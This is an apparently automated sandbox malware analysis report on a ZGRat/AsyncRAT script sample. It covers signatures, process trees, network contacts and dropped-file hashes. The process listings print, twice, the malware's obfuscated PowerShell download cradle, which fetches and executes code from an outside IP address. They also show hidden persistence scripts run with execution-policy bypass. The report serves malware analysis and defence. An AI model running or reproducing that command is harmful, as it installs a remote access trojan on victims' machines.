Malware Analysis Report

2025-06-16 02:15

Sample ID 240125-nn2hksffbq
Target f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3)
SHA256 f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
Tags
zgrat rat asyncrat default
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db

Threat Level: Known bad

The file f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3) was found to be: Known bad.

Malicious Activity Summary

zgrat rat asyncrat default

Detect ZGRat V1

ZGRat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Checks computer location settings

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-25 11:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-25 11:33

Reported

2024-01-25 11:36

Platform

win7-20231215-en

Max time kernel

140s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy(aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyGaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyM *aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy-aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyOaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy*aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy)NaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy.aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEybaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy).DaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEywaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyaaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEydaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEySaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyraUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy','')|iex

C:\Windows\system32\taskeng.exe

taskeng.exe {A605EA56-7FCE-4A22-BA4B-B804128017D9} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Public\hich.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"

Network

Country Destination Domain Proto
FR 185.81.157.103:80 185.81.157.103 tcp
FR 185.81.157.103:80 185.81.157.103 tcp

Files

memory/2284-7-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/2284-8-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/2284-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

memory/2284-12-0x0000000002C70000-0x0000000002CF0000-memory.dmp

memory/2284-11-0x0000000002C70000-0x0000000002CF0000-memory.dmp

memory/2284-10-0x0000000002C70000-0x0000000002CF0000-memory.dmp

memory/2284-13-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

memory/2284-17-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

C:\Users\Public\hich.vbs

MD5 741b5b0a474f0e0cd28fd880f68723c0
SHA1 4de5489c4e56882514b3ab432048200eae65f90d
SHA256 f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA512 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

C:\Users\Public\hich.bat

MD5 6c8a34a94e068b809145df09acbe153c
SHA1 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256 c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA512 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 615a7b1b6cd63e8be3b318138ff66688
SHA1 f0fb5b11ff93a7448a158b2345737fd336c6893d
SHA256 b04be3f8c76d1e49c8f94d01bf8567c5b35295031c9edf676989d0b489d09a1c
SHA512 19d30cb7e4c6d1412ca22383fd3de296eff42a17118bf9a05e9acac5cb974bf7f7a709437cb6a7b62679f95710519d30af850729f60f829aebde6bad8cc439d0

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9G1B1EYCVQY3966BXDZH.temp

MD5 e32cad1ab4c8a3ad44873e572ee4dc01
SHA1 d0bf141a980383e56b523ccf0203ae37151ab10f
SHA256 ed659d481dde23fd44f7a4a9c3c44cc27151e472f56652ab6053a3cf0c48b8d6
SHA512 aa0cff138df661064838132e286180d365d4f5f58c46879efddffada1cf7d4322f3d1d4e0622d4b873b02713d06a85bb26a1c8b1673595435e2f68366523e48c

memory/2184-25-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/2184-27-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2184-28-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/2184-31-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2184-30-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2184-29-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

memory/2184-26-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

C:\Users\Public\hich.ps1

MD5 7cc8cf044a1603d177667066b558742b
SHA1 822b16d67f89023109a2fb8a091c7949f7fb3bc4
SHA256 3afa667e8bb93d5f1336e4e4ffdaa5c31508b3ff4d06309931f0a95121636d19
SHA512 28bd26a588b874196e79b1e993ec9116fe0c3777c91630b5154fa745b378719726805162fcab9bac2b76cea30f20bc119d51eed9d4e95bd72cae68283b6ad175

memory/2184-32-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2184-34-0x0000000002AA0000-0x0000000002AD4000-memory.dmp

memory/2184-35-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

memory/2184-36-0x0000000002DB0000-0x0000000002E30000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-25 11:33

Reported

2024-01-25 11:36

Platform

win10v2004-20231222-en

Max time kernel

144s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4800 set thread context of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3984 wrote to memory of 2056 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3984 wrote to memory of 2056 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3748 wrote to memory of 444 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3748 wrote to memory of 444 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 444 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 444 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy(aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyGaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyM *aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy-aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyOaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy*aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy)NaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy.aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEybaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy).DaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEywaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyaaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEydaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEySaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZ